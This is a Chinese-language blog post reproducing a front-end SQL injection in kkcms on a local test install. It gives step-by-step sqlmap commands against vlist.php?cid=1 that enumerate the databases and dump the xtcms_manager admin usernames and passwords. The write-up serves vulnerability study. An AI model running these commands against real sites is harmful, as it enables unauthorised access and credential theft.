kkcms前台sql注入漏洞复现
kkcms前台sql注入漏洞复现
目录
安装kkcms
漏洞复现
安装kkcms
下载kkcms地址:
https://github.com/https://github.com/
浏览器访问主机ip/kkcms-master/install
按照提示傻瓜式安装,中间填一下数据库名和数据库账号密码。
漏洞复现
寻找漏洞点, 浏览器访问主机ip/kkcms-master/vlist.php?cid=1。我这里是把文件名kkcms-master改成kkcms才这么搜,默认文件名是kkcms-master,你也可以跟着我这样子改,按照实际情况来。
访问后,有回显。
在URL后面加一个单引号,没有回显
用sqlmap来跑网站数据库的数据。获取数据库所有库的名称:sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" --dbs
获取当前使用的数据库名称sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" --current -db。跑出来了当前使用的数据库名称是kkcms。
获取kkcms库下的表sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" –tables。跑出来了有21个表。
获取xtcms_manager 表中的字段sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" -T "xtcms_manager" --columns
查看m_name和m_password字段下的数据sqlmap.py -u "http://192.168.1.36/kkcms/vlist.php?cid=1" -D "kkcms" -T "xtcms_manager" -C "m_name,m_password" -dump。跑出来了网站管理员的用户名和密码。智能得很,还解密了。这是默认的后台登陆账号密码。
想看看其他表里的数据也可以,不过新建的大多都是没有数据,而有数据的也没什么价值,所以选择了xtcms_manager 这个表。
完
kkcms前台sql注入漏洞复现相关推荐
- espcms5.7.13 sql注入漏洞复现
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...
- 通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...
- 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现
漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...
- 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...
- 畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...
- (CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现
漏洞信息 漏洞名称 ApacheSkyWalking SQL注入漏洞 漏洞编号 CVE-2020-9483 危害等级 高危 漏洞类型 通用型漏洞 漏洞厂商 Apache 漏洞概述 当使用H2 / My ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...
- 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...
最新文章
- foxmail提示不知道这样的主机_不知道和婚礼策划师沟通时谈哪些?这样做让你高效备婚...
- 3D游戏引擎设计 实时计算机图形学的应用方法 第2版 pdf 带索引书签目录
- 如何关闭SAP Fiori的病毒扫描设置
- python全栈面试题_python面试题大全(一)
- 虚拟化VMware ESXi 6.7服务器安装配置详细步骤图文
- azure云数据库_将Azure SQL数据库警报集成到Slack
- 豆瓣评分 9.7,等了好久的《操作系统导论》Operating Systems 终于来了
- ExtJS简介--车辆调度
- 一文了解11个常见的多变量分析方法!
- cad查看_CAD快速看图 for mac(CAD图纸查看工具) v4.3.7中文版
- php json转数组不成功,phpjson转数组出错
- html 给表格添加背景,HTML中新建表格怎么加背景
- 手把手教你接入支付宝支付
- 解读阿里云是干什么的?
- Redirected Walking
- 基于51单片机智能小车的设计与实现
- win7 install solution for intel SKL and BSW platform
- OpenCV对矩阵进行padding操作
- python网络爬虫一
- 几种常见的概率统计谬误
热门文章
- ANSYS_Maxwell平面电场仿真
- C++ MFC棋牌类小游戏day1
- 【洞见研报】研报速读:厨房小家电行业报告——“沙发经济”走向“厨房经济”(小家电,厨房小家电,厨房经济)
- layui框架KIT ADMIN后台管理系统模板
- FPGA之CRC校验
- 单片机IO直接驱动段式LCD详细说明+代码
- BI自动化之Python自动发报告(查询数据库生成报表和图片嵌入邮件)
- 【毕设进行时-工业大数据,数据挖掘】对数据库的稍大规模的读写
- 如何用 Python 做自动化测试
- IDM 在chrome拓展没有办法使用的解决方法